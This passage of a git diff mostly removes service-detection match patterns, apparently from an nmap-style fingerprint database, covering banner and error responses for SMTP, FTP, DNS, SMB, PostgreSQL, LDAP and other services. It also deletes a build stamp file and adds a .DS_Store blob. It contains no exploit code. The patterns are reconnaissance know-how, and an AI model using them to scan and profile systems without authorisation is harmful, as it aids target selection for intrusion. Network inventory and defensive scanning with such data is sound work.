\0 -\n\r\nJava Whois Server ([\w._-]+) \(c\) \d+ - \d+ Klaus Zerwes zero-sys\.net\r\n\n -\x01\0\0\0\x02\0\0 - -HTTP/1\.1 200 OK\r\nServer: DavMail Gateway ([\w._-]+)\r\nDAV: 1, calendar-access, calendar-schedule, calendarserver-private-events, addressbook\r\n -HTTP/1\.0 400 Bad Request\r\nServer: Web Sharing\r\nContent-type: text/html\r\n\r\n400 Bad RequestThe URL you requested could not be understood by the server\. Do not include double slashes or colon characters in the URL\.\r\n\r\n -HTTP/1\.0 \d\d\d.*\r\nServer: B[iI][gG]-?IP\r\n -\x10\x1a\x0b\x00\x60\x4d -HTTP/1\.1 406 Not Acceptable\r\nCache-Control: no-cache\r\nPragma: no-cache\r\nContent-Type: text/html; charset=utf-8\r\nConnection: close\r\nContent-Length: 616\r\n\r\n\nRequest Error -\r\n400 Bad Request\r\n\r\n

400 Bad Request

\r\n
nginx
\r\n\r\n\r\n -RTSP/1\.0 400 Bad Request\r\nServer: PanWeb Server/([\w._-]+)\r\n.*Keep-Alive: timeout=60, max=2000\r\nContent-Type: text/html\r\nContent-length: 130\r\n\r\nDocument Error: Bad Request -RTSP/1\.0 403 Forbidden: Proxy not licensed\r\nSession: \w+\r\n\r\n -RTSP/1\.0 400 Bad request\nContent-type: text/html\n\n -HTTP/1\.1 400 Bad Request\r\nDate: .*\r\nServer: Unknown/0\.0 UPnP/([\d.]+) Virata-EmWeb/([-.\w]+)\r\n -(?:p9sk1@[\w._-]+ )*p9sk1@([\w._-]+)\0/bin/exportfs: auth_proxy: auth_proxy rpc write: : invalid argument\n -<\?xml version=\"1\.0\" encoding=\"UTF-8\"\?>\n\n\n \n com\.kapowtech\.robosuite\.api\.java\.rql\.RQLProtocolException: Invalid byte 1 of 1-byte UTF-8 sequence\. -\0\0\0\0\0\x84\0\x10\x7c\x9f\xfb\0\0\0\0\0 -\x04\x01\0C..\0\0\xaa\0\0\0/\x0f\xa2\x01\x0e.. Login failed\r\n\x14Microsoft SQL Server\0\0\0\xfd\0\xfd\0\0\0\0\0\x02 -\x01Permission denied\.\n -\xde\xad\xbe\xef\x04\0\xff\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x1fem\.requestparserparser\.InvError -\x16\x15\x16\x16\x16\x12XW\] -\x07version\x04bind\0\0\x10\0.\xc0\x0c\0\x10\0\x01\0\0\0\x05\0..Served by PowerDNS - http://www\.powerdns\.com -\0\x06\x81\x80\0\x01\0\x01\0\0\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03.......PowerDNS Recursor ([\w._-]+) (\Id: pdns_recursor\.cc .*?\) -\0\x06\x81\x80\0\x01\0\x01\0\0\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x01\0\x01\0\0\0\x03\0\x04.... -\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 -..\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0...[\w._-]+-RedHat-([\w._-]+\.el5_[\w._-]+)\xc0\x0c\0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c -\0\x1e\0\x06\x81\x84\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 -..*\x07version\x04bind.*Incognito DNS \w+ ([\d.]+) \( -\0\x1e\0\x06\x81\x85\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 -\x01Login incorrect\.\n -\x01rexecd: Login incorrect.?\n -\x01rexecd: [-\d]+ Connexion incorrecte\.\n -\x01INTERnet ACP AUXS failure Status = %LOGIN-F-NOSUCHUSER\r\n\0 -\0\x0c\0\x06\x81\x04\0\0\0\0\0\0\0\0 -\0\x0c\0\x06\x80\x05\0\0\0\0\0\0\0\0 -\0\x0c\0\x06\x81\x84\0\0\0\0\0\0\0\0 -\0\x86\x05\x02\0\0\x07\?\0\x01\x01@\0\0\0\0\0\0\0\0\0H\Id: //ral_depot/products/IxChariot6\.50\.24/ENDPOINT/CODE/client\.c#3 \\0\0\0\x1a\x7f\0\x02\0\x0ce1_thread\0\0\x18main_process_incoming\0 -\0\^A\^@\^@\^@\^@\^@\^@\^Gversion\^Dbind\^@\^@\^P\^@\r\n-> shell restarted\.\r\n\r\n-> -\0\r\n-> trcStack aborted: error in top frame\r\ntShell restarted\.\r\n\r\n-> !1 echo_recv: -1\.\r\n -\x01krshd: Echec de l'authentification Kerberos\.\r\n\0 -\0\x1e\0\x06\0\t\0\0 -\0\x11Invalid command\n\0\0\0 -\x01krlogind: Echec de l'authentification Kerberos\.\r\n\0 -\x01in\.utrcmdd \(remote\): protocol error \(1\)\n\0 -1\0 -\0&\xeb\xefTQM\xee\[B -\0(?:\x03\x58\0)?\x6a\x01\0\0\0\0Your client is too old\. To use this server, please upgrade your client to a Freeciv 2\.2 or later\.\0\0\0\x03\0\0\x03\x01 -\xe3\r\n\r\n\0\x01\0.\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol -.*\Id: //ral_depot/products/current/ENDPOINT/CODE/client\.c -\x04\x01\0\(\0\0\0\0\xaa\0\x14\0\0\x0f\xa2\x01\x0eLogin failed\.\n\xfd\0\x02\0\x02\0\0\0\0 -\0\x1e\x02\x06\x01\0\0\0\0\0\0\xf1\0 -HTTP/1\.0 414 Request-URI Too Long\r\nServer: Linux/([\w._-]+) UPnP/([\w._-]+) fbxigdd/([\w._-]+)\r\nConnection: close\r\n\r\n -\0\x0c\0\0\x90\x04\0\0\0\0\0\0\0\0 -\0\x0c\0\0\x90\x84\0\0\0\0\0\0\0\0 -\0\0s\0\0\0\0\0 -\xff\0\x0e\0P\0r\0o\0t\0o\0c\0o\0l\0 \0e\0r\0r\0o\0r -\d{1,2}:\d\d:\d\d \d{1,2}/\d\d/\d{4}\n -220 ([\w_.-]+) ESMTP\r\n501 ehlo requires domain/address - see RFC-2821 4\.1\.1\.1\r\n -220 ([\w_.-]+) ready\r\n250-[\w_.-]+\r\n250 AUTH LOGIN PLAIN \r\n -cvs \[pserver aborted\]: bad auth protocol start: HELP\r\n\n? -cvs \[server aborted\]: bad auth protocol start: HELP\r\n -cvs \[server aborted\]: bad auth protocol start: HELP\r\nerror \n -cvs-pserver \[pserver aborted\]: bad auth protocol start: HELP\r\n\n -HELP\r\n -220 .*\r\n214-The following commands are recognized \(\* =>'s unimplemented\):\r\n CWD XCWD CDUP XCUP SMNT\* QUIT PORT PASV \r\n EPRT EPSV ALLO\* RNFR RNTO DELE MDTM RMD \r\n XRMD MKD XMKD PWD XPWD SIZE SYST HELP \r\n NOOP FEAT OPTS AUTH\*? CCC\* CONF\* ENC\* MIC\* \r\n PBSZ\*? PROT\*? TYPE STRU MODE RETR STOR STOU \r\n -220 FTP server ready\.\r\n214- The following commands are recognized \(\* =>'s unimplemented\)\.\r\n USER PORT TYPE MLFL\* MRCP\* DELE SYST RMD STOU \r\n PASS LPRT STRU MAIL\* ALLO CWD STAT XRMD SIZE \r\n ACCT\* EPRT MODE MSND\* REST XCWD HELP PWD MDTM \r\n SMNT\* PASV RETR MSOM\* RNFR LIST NOOP XPWD \r\n REIN\* LPSV STOR MSAM\* RNTO NLST MKD CDUP \r\n QUIT EPSV APPE MRSQ\* ABOR SITE XMKD XCUP \r\n214 End\.\r\n -220 ([-\w_.]+) FTP server \(UNIX_SV ([\d.]+)\) ready\.\r\n214-The following commands are recognized \(\* =>'s unimplemented\)\.\r\n USER PORT STOR MSAM\* RNTO NLST MKD CDUP \r\n PASS PASV APPE MRSQ\* ABOR SITE XMKD XCUP \r\n ACCT\* TYPE MLFL\* MRCP\* DELE SYST RMD STOU \r\n SMNT\* STRU MAIL\* ALLO CWD STAT XRMD SIZE \r\n REIN\* MODE MSND\* REST XCWD HELP PWD MDTM \r\n QUIT RETR MSOM\* RNFR LIST NOOP XPWD \r\n -220 FTP server ready\r\n214-The following commands are recognized:\r\nHELP\tUSER\tPASS\tQUIT\tLIST\tNLST\r\nRETR\tSTOR\tCWD\tTYPE\tPORT\tPWD\r\nSTRU\tMODE\tALLO\tACCT\tPASV\tNOOP\r\nDELE\tEPRT\tEPSV\r\n214 End of command list\.\r\n| p|TopLayer/Alcatel ftpd -220 Connection established\.\r\n214-The following commands are supported:\r\n\tUSER\tPORT\tTYPE\tABOR\tCWD \tLIST\r\n -220 FTP Server Ready\r\n.*\r\n214 Direct comments to psp@amoks\.com\.\r\n -220 FTP server ready\r\n211 HELP text\r\n -220 Connection established\.\r\n214-The following commands are supported\.\r\n USER PORT TYPE ABOR CWD LIST\r\n PASS PASV STRU PWD XCWD NLST\r\n QUIT STOR MODE XPWD NOOP HELP\r\n214 End of HELP\r\n -220 Welcome to connection\.\r\n214 FTP Server Help\.\r\n HUMAX PVR FTP Server\. \r\n214 End\r\n -(?:220-.*\r\n)?220 .*\r\n530 Please login with USER and PASS\.\r\n -220 Service Ready\r\n502 Command Not implemented\r\n -HTTP/1\.1 400 Parse error: Could not parse request line \(split\.length=1\): HELP\r\n -0 , 0 : ERROR : UNKNOWN-ERROR\r\n -HELP : USERID : UNIX : trilluser\r\n -\d+, \d+ : USERID : UNIX : [-.@\w]+\r\n -0, 0 : ERROR : UNKNOWN-ERROR -:([-\w_.]+) 451 \* :You have not registered\r\n -:([-\w_.]+) 451 \* :Register first\.\r\n -NOTICE AUTH :\*\*\* Checking Ident\r\n:([-\w_.]+) 451 \* :Register first\.\r\n -:([-\w_.]+) 290 :\.-----------------=#\[ euIRCd HelpSystem \]#=----------------\.\n -200 NNTP server ready\r\n100 Avaliable commands:\r\nARTICLE\r\nAUTHINFO\r\nBODY\r\nGROUP\r\nHEAD\r\nHELP\r\nIHAVE\r\nLAST\r\nLIST\r\nNEWGROUPS\r\nNEWNEWS\r\nNEXT\r\nPOST\r\nQUIT\r\nSLAVE\r\nSTAT\r\nXHDR\r\n\.\r\n| p|Hamster Playground/Kerio nntpd -\x01Socket \d+ received unknown command 0x48 with arguments ELP -false;error while receiving message from client\n -220 ([-.+\w]+) Generic SMTP handler\r\n214 Help not supported by this implementation\r\n -220.*?\n214-Commands supported:\r\n214- HELO EHLO MAIL RCPT DATA(?: ETRN)?(?: AUTH)?\r\n214 NOOP QUIT RSET HELP \r\n -220 ([-.\w]+) SMTP version 1\.00;\r\n214 We strongly advise you to study (?:of )?the RFC ?821\.\.\.\r\n -220 ([-\w_.]+) ESMTP\r\n402 Error: command not implemented\r\n -220 smtpd\r\n502 [\d.]+ Error: command not recognized\r\n -220 E?SMTP [^\r\n]*\r\n502 5\.5\.2 Error: command not recognized\r\n -220 ([-\w_.]+) ESMTP \w+\r\n -220 (\S+) E?SMTP Sendmail; -220.*214 SMTP server comments and bug reports to: \ -220.*500 MessageWall: Unrecognized command -220 .*\r\n214-Commands Supported:\r\n214-HELO EHLO AUTH HELP QUIT MAIL NOOP RSET RCPT DATA ETRN VRFY STARTTLS\r\n214-Copyright \(c\) 1995-200\d, Stalker Software, Inc\.\r\n -220 .* ESMTP\r\n214-Gentoo Linux qmail-([-\w.]+)\r\n214 qmail home page: http://pobox\.com/~djb/qmail\.html\r\n -220 ([-\w_.]+) ESMTP\r\n214-The following commands are recognized\r\n214-\tauth\tdata\tehlo\t -220 \[?([-\w_.]+)\]? ESMTP server ready\.\r\n214-Recognized SMTP commands are:\r\n214- HELO EHLO MAIL RCPT DATA RSET\r\n214- AUTH NOOP QUIT HELP VRFY SOML\r\n214 Mail server account is '([-\w_.]+)'\.\r\n| p|Mercury/32 smtpd -220 ([-\w_.]+) Server ESMTP ready at .*\r\n241-\r\n -220 ([-\w_.]+) ESMTP \r\n -220 ([-\w_.]+)\r\n214-Commands supported:\r\n214 AUTH STARTTLS HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP\r\n -220 ([-\w_.]+) MailShield SMTP\r\n -220-([-\w_.]+) ESMTP\r\n220-MagicMail Daemon with Built-In Anti-Spam\r\n220 See http://www\.linuxmagic\.com for info\r\n214 qmail home page: http://cr\.yp\.to/qmail\.html, LinuxMagic Support http://www\.linuxmagic\.com\r\n -220 ESMTP Service ready at .*\r\n214-Enter one of the following commands:\r\n214-HELO EHLO MAIL RCPT DATA RSET NOOP QUIT\r\n214 HELP \r\n -220 ([-\w_.]+) ESMTP MTA\r\n214-This is Sendmail version AIX([\d.]+)/([\w.]+)\r\n -220 Service ESMTP Ready\r\n214-This is Sendmail version ([\d.]+) \((P[-\w_.]+)\)\r\n.*future enhancements, contact your HP representative -220 ([-\w_.]+)\r\n502 Command not implemented\r\n -220 ([-\w_.]+) ESMTP[^\r\n]*\r\n211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\r\n\r\n -220 ([-\w_.]+) - Ready at .*\r\n214-Commands:\r\n214- HELO MAIL RCPT DATA RSET NOOP QUIT\r\n214- For more info use 'HELP '\.\r\n214 End of HELP info\r\n -220 ESMTP Service ready\r\n500 Command unrecognized\r\n -220 ([-\w_.]+) ESMTP [-\w_.]+ Mail Server ([\d.]+); .*\r\n214-2\.0\.0 This is [-\w_.]+ Mail Server [-\w_.]+\r\n214-2\.0\.0 Topics:\r\n -220 WebMail ESMTP\r\n502 negative vibes\r\n -220 Welcome to the mail server\.\r\n211 DATA EXPN HELO MAIL NOOP QUIT RCPT RSET SAML SEND SOML TURN VRFY\r\n -220 .*\r\n214-This is ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [-\w_.]+ \(([-\w_.]+)\)\r\n -220 ([-\w_.]+) Service ready\.\r\n214- Valid commands are:\r\n214- HELO MAIL RCPT DATA RSET QUIT NOOP\r\n214- HELP VRFY\r\n214- Commands not valid are:\r\n214- SEND SOML SAML TURN\r\n214- Mail forwarding handled by this server\.\r\n| p|i5/OS V5R4M0 or OS/400 smtpd -220 ([-\w_.]+) ESMTP server is ready\r\n.*214-Copyright \(c\) 1995-2004, Stalker Software, Inc\.\r\n -220 ([-\w_.]+) ESMTP\r\n211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\r\n -220 ([-\w_.]+) ESMTP Generic Ready\r\n502 Command not implemented\.\r\n -220 ([\w_.-]+) ESMTP\r\n214-Run 'info anubis' or visit http://www\.gnu\.org/software/anubis/manual/\r\n214 End of HELP info\r\n -220 SMTP service ready\r\n214-Commands:\r\n214-\tDATA\tRCPT\tMAIL\tQUIT\tRSET\r\n214 \tHELO\tVRFY\tEXPN\tHELP\tNOOP\r\n -220 ready\r\n214-Commands:\r\n214- HELO MAIL RCPT DATA\r\n214- RSET NOOP QUIT HELP\r\n214- VRFY EXPN\r\n214-For more info use HELP \r\n214 End of HELP info\r\n -220 ([-\w_.]+) SMTP; .*\r\n500 Syntax error, command unrecognized\.\r\n -220 ([-\w_.]+) SMTP; .* \+\d{4}\r\n500 Syntax error, command unrecognized\r\n -220 ([-\w_.]+) ESMTP smtprelay service ready\.\r\n214-This is smtprelay\r\n214-Topics: -220 SMTP ESMTP ready at .*0\r\n214-\r\n214 End of HELP info\r\n -220 ([-\w_.]+)\r\n214-HELO domain\r\n214-EHLO domain\r\n214-QUIT\r\n214-MAIL FROM: \[options\]\r\n -220 ([-\w_.]+) ESMTP Ready\r\n211 Help:->Supported Commands: HELO,EHLO,QUIT,HELP,RCPT,MAIL,DATA,RSET,NOOP\r\n -220 ([-\w_.]+) SMTP Relay Service ready\r\n500 Syntax error, command unrecognized\r\n -503 Synchronization error\r\n -(sgi_[-.\w]+\r\n(?:[-.\w]+\r\n)*) -Welcome to Vulnerable Server! Enter HELP for help\.\nValid Commands:\nHELP\nSTATS \[stat_value\]\nRTIME \[rtime_value\]\nLTIME \[ltime_value\]\nSRUN \[srun_value\]\nTRUN \[trun_value\]\nGMON \[gmon_value\]\nGDOG \[gdog_value\]\nKSTET \[kstet_value\]\nGTER \[gter_value\]\nHTER \[hter_value\]\nLTER \[lter_value\]\nKSTAN \[lstan_value\]\nEXIT\n -Commands: HELP VER GET LIST SET INSTCMD LOGIN LOGOUT USERNAME PASSWORD STARTTLS\n -Commands: VER REQ HELP LISTVARS LOGOUT LOGIN PASSWORD LISTRW VARTYPE VARDESC ENUM SET INSTCMD LISTINSTCMD INSTCMDDESC FSD MASTER USERNAME STARTTLS\n -\x05\xff -\x01\x03\0\0........\0\0\0\0........\x9f\xfb.([^\0\x01]+)[\0\x01].*VMware(\d+),(\d+)\x05\x06AFP3\.4\x06AFP3\.3\x06AFP3\.2\x06AFP3\.1\x06AFPX03\x06\tDHCAST128\x04DHX2\x06Recon1\rClient Krb v2\x03GSS\x0fNo User Authent.*\x1b\not_defined_in_RFC4178@please_ignore -AB\0N\x04\x01\x94\0\x06/cccb/\0\0\x02\0\x0cContent-Type\0\0\x17text/html;charset=utf-8\0\0\x0eContent-Length\0\0\x03970\0AB\x03 -\x02\0\0\x01\x03\0U\xd0DSQ\x02\0\0\x01\x03\0U\xd0DSQ -\0\r\nlogin: \^W\^@\^@\^@\^ -\x15\x01\0\0\x08\0\0\0\0\x80\t\x03\x08 -\x16\x03\0\0\*\x02\0\0&\x03.*\x0edropbox-client0 -\x16\x03\0\0\*\x02\0\0&\x03\0.*T[oO][rR]1.*[\x00-\x20]([-\w_.]+) -\x16\x03\0.*Router\([a-zA-Z0-9_-]+).*Sophos EM Certification Manager -\x16\x03\0.*Sophos EM Certification Manager -\0\0MF\xff\xf3MBr\0\0\0\0\x08\x01@\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\0\x81\0\x02PC NETWORK PROGRAM 1\.0\0\x02MICROSOFT NETWORKS 1\.03\0\x02MICROSOFT NETWORKS 3\.0\0\x02LANMAN1\.0\0\x02LM1\.2X002\0\x02Samba\0\x02NT LANMAN 1\.0\0\x02NT LM 0 -\0\0\0\0\0\0\0=r\0\0\0\0\0\0\0\xd8\x97%\x01\x13\0\0\0CONDUCTUS_PG([\w._-]+)\x1a\0\0\0unbekannter Code: 19240920 -\0\0\0\0\0\0\0;r\0\0\0\0\0\0\0h\xd52\t\x10\0\0\0FUNDUS_PG([\w._-]+)\x1b\0\0\0unbekannter Code: 154326376 -\0\0\0\0\0\0\0;r\0\0\0\0\0\0\0XL\)\x01\x11\0\0\0PARATUS_PG([\w._-]+)\x1a\0\0\0unbekannter Code: 19483736 -\0\0\0\0\0\0\0>r\0\0\0\0\0\0\0\xf8\x926\x01\x14\0\0\0CONSPECTUS_PG([\w._-]+)\x1a\0\0\0unbekannter Code: 20353784 -\xce\xfa\x01\0\x16\0\0\0\0\0\0\x003\xf6\0\0\0\0\0\0\0\0 -\x52\x00\x00\x00\x08\x00\x00\x00\x03 -\0\0\0\x02\0\x03 -\0\0\x01\x01@\n\0\x08\x80\0\x82\0L\xb8..\xff\xff\xff\xff\0\0\0\0 -\0\0\0\x61\xffSMBr\0\0\0\0\x88\x03\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x06\0\x02\x0a\0\x01\0....\xff\xff\x00\x00....\0\x03\0\0\0 -\0\0\0.\xffSMBr\0\0\0\0\x88..\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x06\0..\0\x01\0..\0\0...\0..\0\0 -\x83\0\0\x01\x8f -\0\0\0.\xffSMBr\0\0\0\0\x98\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x07\0.*\W([-_.\w]+)\0 -\0\0\0.\xffSMBr\0\0\0\0\x88\x01.\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x07\0 -\0\0\0M\xffSMBr\0\0\0\0\x98\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x07\0\x02\x01\0\x01\0\xff\xff\0\0\xff\xff\0\0\0\0\0\0\x01\x02\0\0 -\0\0\0G\xffSMBr\0\0\0\0\x88\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\r\x04\0\0\0\xa0\x05\x02\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0WORKGROUP\0 -\0\0\0G\xffSMBr\0\0\0\0\x88\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\r\x04\0\0\0\xa0\x05\x02\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 -\0\0\0.15\0 \x07\x01\[12:1\]\0 \x07\x02\[2003\]\0 \x07\x051\d+\0 INET\0 ([\w._-]+)\0|s p|HP OpenView Omniback/Data Protector -E\0\0\0.S\w+\0C0A000\0Mel protocolo 65363\.19778 no est..? soportado: servidor soporta 1\.0 hasta 3\.0\0Fpostmaster\.c\0L\d+\0 -E\0\0\0.S\w+\0C0A000\0Mnicht unterst\xc3\xbctztes Frontend-Protokoll 65363\.19778: Server unterst\xc3\xbctzt 1\.0 bis 3\.0\0Fpostmaster\.c\0L\d+\0 -E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1293\0RProcessStartupPacket\0\0 -E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1408\0RProcessStartupPacket\0\0 -E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1445\0RProcessStartupPacket\0\0 -E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1454\0RProcessStartupPacket\0\0 -E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1440\0RProcessStartupPacket\0\0 -E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1497\0RProcessStartupPacket\0\0 -E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1507\0RProcessStartupPacket\0\0 -E\0\0\0\x9dSFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0F\.\\src\\backend\\postmaster\\postmaster\.c\0L1507\0RProcessStartupPacket\0\0 -E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1570\0RProcessStartupPacket\0\0 -E\0\0\0\x9dSFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0F\.\\src\\backend\\postmaster\\postmaster\.c\0L1621\0RProcessStartupPacket\0\0 -E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1621\0RProcessStartupPacket\0\0 -E\0\0\0\x94SFATAL\0C0A000\0MProtocole non support\?e de l'interface 65363\.19778 : le serveur supporte de 1\.0 \?\n3\.0\0Fpostmaster\.c\0L1621\0RProcessStartupPacket\0\0 -E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1666\0RProcessStartupPacket\0\0 -E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1694\0RProcessStartupPacket\0\0 -E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1695\0RProcessStartupPacket\0\0 -\0\0\0\sequence_number=\[0\] result=\[-2005\] \0 -\0\0\0\x0e\*\*DPTMMSG\*\*\0\0\xf8 -\0\0\0.\xffSMBr\0\0\0\0\x80|s p|Nortel/D-Link router instant setup -\xcd\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\x02\0\0\0\0\0 -\0\0\0\x152999 Invalid command\n\xff\xff\xff\xfc -\0\0\0\x0b3999 No go\n -2[23]0 FTP Server Ready\r\n504 Comand length not supported\.\r\n -\0\0\x02\0\0\0\0\0\0\0\0\0\r\0\0\0\0.......International Business Machines Corp\. -\0\x01\0\x03\0\0\0/Incompatible version number: message discarded\. -\x01\0\x0b\0\0.....\0\0\0\0.*Sun Microsystems, Inc\. -\x01\0\x0b\0\0.*Conectiva Linux \(XFree86 ([\d.]+), patch level (\w+)\) -\0J\x0b\0\0...This copy of X-Win32 will only accept connections from network ([\d.]+)\0\0 -\x01\0\x0b\0\0.....\0\0\0\0.*HDS Network Systems, Inc\. \(([^)]+)\) -\0\0\x02\0\0\0\x01\0\x04\0\0\0\0\r([\w._-]+):\d+\0\x07\0\0\0\0 \x10\0,\x1a\0\0X\.Org Foundation\x01\n\x01\0\x05\0\0\0\xe6\xbf\xc0\xb5\0\0\0\0\0\0\0\0 -GIOP\x01\0\x01\x06\0\0\0\0 -\x80\xf0\x80\x12\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01 -RTSP/1\.0 400 Bad Request\r\nServer: AirTunes/([\w._-]+)\r\n\r\n -\0 -default: unknown printer\n -VSE Line Printer Daemon has rejected this request\.\0\0 -no queue to check\n\0 -EXM {EXC \0\x1fcom\.rbnb\.api\.SerializeExceptionMSG \0JUnrecognizable parameter read from input stream\.\nElement read was \x01default}\r\nPNG {}\r\n| p/Ring Buffered Network Bus/ i|http://outlet.creare.com/rbnb/ -\x02rFactorMonitor\x000400\0 -\0\0\0\t51000000\0\0\0\0[^\0] -0%\x02\x01\x01a \n\x010\x04\0\x04\x19anonymous bind disallowed -02\x02\x01\x01a-\n\x01\x02\x04\0\x04&requested protocol version not allowed -0E\x02\x01\x01a@\n\x01\x02\x04\0\x049historical protocol version requested, use LDAPv3 instead -0\x84\0\0\0I\x02\x01\x01a\x84\0\0\0@\n\x01\x02\x04\0\x049historical protocol version requested, use LDAPv3 instead -0\x1a\x02\x01\x01a\x15\n\x01\0\x04\0\x04\x0eanonymous bind -0\x84\0\0\0\x10\x02\x01\x01a\x84\0\0\0\x07\n\x01\0\x04\0\x04\0 -0\.\x02\x01\x01a\)\n\x010\x04\0\x04\"Failed, anonymous bind not allowed -0&\x02\x01\x01a!\n\x01\x02\x04\0\x04\x1aOnly LDAP v3 is supported\. -0\x1a\x02\x01\x01a\x15\n\x01\0\x04\0\x04\x0eBind succeeded - -TNMP\x16\0\0\0TNME\x80\0\xfe\xff..([\w.]+):(\d) -\0\x04\0 -TNMP.\0\0\0TNME.\0\0\0USER.\x07\x04\0\x08\0.{9}\0P\0\x03\0U\0\xff\xff\0.*Desktop Manager ([\d.]+)\0 -ActiveFax Server: Es befinden sich insgesamt -\x03\0\x26 -no entries\n -Host Name: ([-\w_.]+)\nPrinter Device: hp LaserJet (\w+)\nPrinter Status: ([^\r\n]+)\n\0\0 -\x03\0\0\x0b\x06\xd0\0\0\x12.\0 -\x03\0\0\x0b\x06\xd0\0\0\x03.\0 -\x03\0\0\x0e\t\xd0\0\0\0[\x02\xa1]\0\xc0\x01\n -\x03\0\0\x0b\x06\xd0\0\x004\x12\0 -.\0\x01.....\0([^\0]+)\0 -\0\0 -\x74\x4e\x63\x50\0\0\0\x10\x33\x33 -\0\0\0\x01\0\x17\0\x14\0\x06\0\0\0.\0\0\0\0\0\0 -.\0\0\0.\0\0\0\x03\0\0@\x02\x0f\0.*\x03\0\0\0\0\x02\0/\0.\0\0\0\0\0\0\0.*CN=([-.\w ]+)/OU=([-.\w ]+)/OU=([-.\w ]+)/O=([-.\w ]+)|s p/Lotus Domino server/ i|CN=1;OU=2/3;Org=4 -\x02\0\0\0\0\0\0/\0\0\0\0\0\0\0\0\0@\x1f\0\0\0\0\0\0\0\0\0/\0\0\0\x02\0\0@\x02\x0f\0\x01\0=\x05\0\0\0\0\0\0\0\0\0\0\0\0\0\)\0\0\0 -\x18\0\x01\x02Invalid packet length\0 -{\"error\":{\"code\":-32700,\"message\":\"Parse error\.\"},\"id\":null,\"jsonrpc\":\"([\w._-]+)\"} -\x02\x06 -\x01\x01\0\xfd\xce\xfa\x0b\xb0\xa0\0\0\0\x0f\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x12 -HTTP/1\.0 400 Bad Request\r\nDate: .*\r\nServer: Boa/([\w._-]+)\r\nConnection: close\r\nContent-Type: text/html\r\n\r\n400 Bad Request\n

400 Bad Request

\nYour client has issued a malformed or illegal request\.\n\n -\0.\0\0\x02\0\0\0.*\(IAGENT = \(AGENT_VERSION = ([\d.]+)\)\(RPC_VERSION = ([\d.]+)\)\) -\0\x20\0\0\x02\0\0\0\x016\0\0\x08\0\x7f\xff\x01\0\0\0\0\x20 -\0.\0\0[\x02\x04]\0\0\0 -\0,\0\0\x04\0\0\0\"\0\0 \(CONNECT_DATA=\(COMMAND=version\)\) diff --git a/src/stamp-h1 b/src/stamp-h1 deleted file mode 100644 index 57ea58e..0000000 --- a/src/stamp-h1 +++ /dev/null @@ -1 +0,0 @@ -timestamp for src/config.h diff --git a/system_files/.DS_Store b/system_files/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..5008ddfcf53c02e82d7eee2e57c38e5672ef89f6 GIT binary patch literal 6148 zcmeH~Jr2S!425mzP>H1@V-^m;4Wg<&0T*E43hX&L&p$$qDprKhvt+--jT7}7np#A3 